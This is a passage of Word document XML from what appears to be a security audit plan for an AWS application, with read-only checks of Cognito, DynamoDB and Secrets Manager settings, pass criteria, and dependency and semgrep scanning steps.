            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">describe-user-pool → UserPoolAddOns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Advanced security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ENFORCED mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">describe-user-pool → UserPoolAddOns.AdvancedSecurityMode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Token expiry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Access: 60min, Refresh: 30 days max</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">describe-user-pool → Policies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Email verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Required for all users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">describe-user-pool → AutoVerifiedAttributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">DynamoDB Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verify encryption at rest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws dynamodb describe-table --table-name rapid-cortex-incidents-prod \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.Table.SSEDescription'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verify point-in-time recovery is enabled on critical tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws dynamodb describe-continuous-backups \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  --table-name rapid-cortex-pricing-audit-prod \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.ContinuousBackupsDescription'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check for tables without DeletionPolicy: Retain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># This must be verified in the SAM/CloudFormation template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -A2 'DeletionPolicy' infra/nested/stack-app-sam.yaml \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | grep -v Retain  # Any output here is a risk for critical tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Secrets Manager Audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># List all secrets and verify none are accessible without auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws secretsmanager list-secrets | jq '.SecretList[].Name'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verify BILLING_PAYMENT_INSTRUCTIONS secret has no placeholder values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws secretsmanager get-secret-value \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  --secret-id {BILLING_PAYMENT_INSTRUCTIONS_SECRET_ARN} \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.SecretString | fromjson | keys'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expected keys: achRoutingNumber, achAccountNumber, achAccountName,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#   wireSwiftCode, wireAccountNumber, checkPayableTo, checkMailAddress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No IAM policies with Action: * except on break-glass accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All S3 buckets have public access blocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cognito advanced security mode set to ENFORCED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All critical DynamoDB tables have DeletionPolicy: Retain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All Secrets Manager secrets have rotation configured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No plaintext credentials found in Lambda environment variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 10 — Static Analysis and Dependency Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Static analysis runs against the source code without executing it, catching common vulnerability patterns, insecure coding practices, and known dependency CVEs. This phase runs in the CI/CD pipeline on every pull request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependency Vulnerability Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># npm audit — check for known CVEs in dependencies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">cd apps/api &amp;&amp; npm audit --audit-level=high</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">cd apps/web &amp;&amp; npm audit --audit-level=high</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Better npm audit with fix suggestions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">npx better-npm-audit audit --level high</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check for outdated packages with known issues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">npx npm-check-updates --target minor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">SAST — Semgrep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Install semgrep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pip3 install semgrep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Run with OWASP rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep --config=p/owasp-top-ten .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
